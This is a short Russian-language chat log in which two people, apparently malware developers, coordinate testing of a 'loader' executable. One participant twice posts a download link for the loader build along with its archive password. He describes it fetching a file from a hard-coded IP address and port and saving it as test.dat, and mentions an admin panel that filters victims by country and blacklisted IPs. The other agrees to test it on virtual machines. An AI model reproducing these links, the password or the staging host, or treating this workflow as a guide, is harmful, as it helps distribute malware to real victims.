[13.12.21 15:05:12] ryan:		Привет
Тестовая версия лоадера: пасс https://qaz.im/load/8DeSyD/Br39ty fdsf7sdf72RR@34gt3T3t4
В этом exe пока включено скачивание и сохранение файла (без запуска)
После запуска должен скачаться файл с https://185.64.104.5:12233/aaa/bbb/ccc и сохраниться в test.dat
[13.12.21 15:05:55] manuel:		Привет. А есть админка кда должен стучать бот?
[13.12.21 15:07:57] ryan:		Отстуков нет, в админке только форма для загрузки файла
[13.12.21 15:08:43] ryan:		И скрипт для отфильтровывания стрна из списка и ip адресов из блеклиста
[13.12.21 15:09:08] manuel:		Так. И что тога протестировать?
[13.12.21 15:09:31] ryan:		Сейчас надо посмотреть скачается файл или нет, на разных системах
[13.12.21 15:10:32] ryan:		После запуска должен test.dat создаться в той же папке что и лоадер
[13.12.21 15:10:40] manuel:		понял проверю.
[16.12.21 10:28:34] manuel:		Привет.
[16.12.21 10:28:57] ryan:		Привет
[16.12.21 10:29:08] manuel:		Можешь перезалить тестовый файл?
[16.12.21 10:29:17] manuel:		ТОлько сейчас тестовые вм доделывают
[16.12.21 10:29:21] manuel:		Еще не тестировал
[16.12.21 10:29:32] ryan:		Сейчас перезалью
[16.12.21 10:32:46] ryan:		Тестовая версия лоадера: пасс https://qaz.im/load/YSiakH/khkaD2 fdsf7sdf72RR@34gt3T3t4
В этом exe пока включено скачивание и сохранение файла (без запуска)
После запуска должен скачаться файл https://185.64.104.5:12233/aaa/bbb/ccc и сохраниться в test.dat
[16.12.21 10:33:01] manuel:		Есть. Буду тестировать.
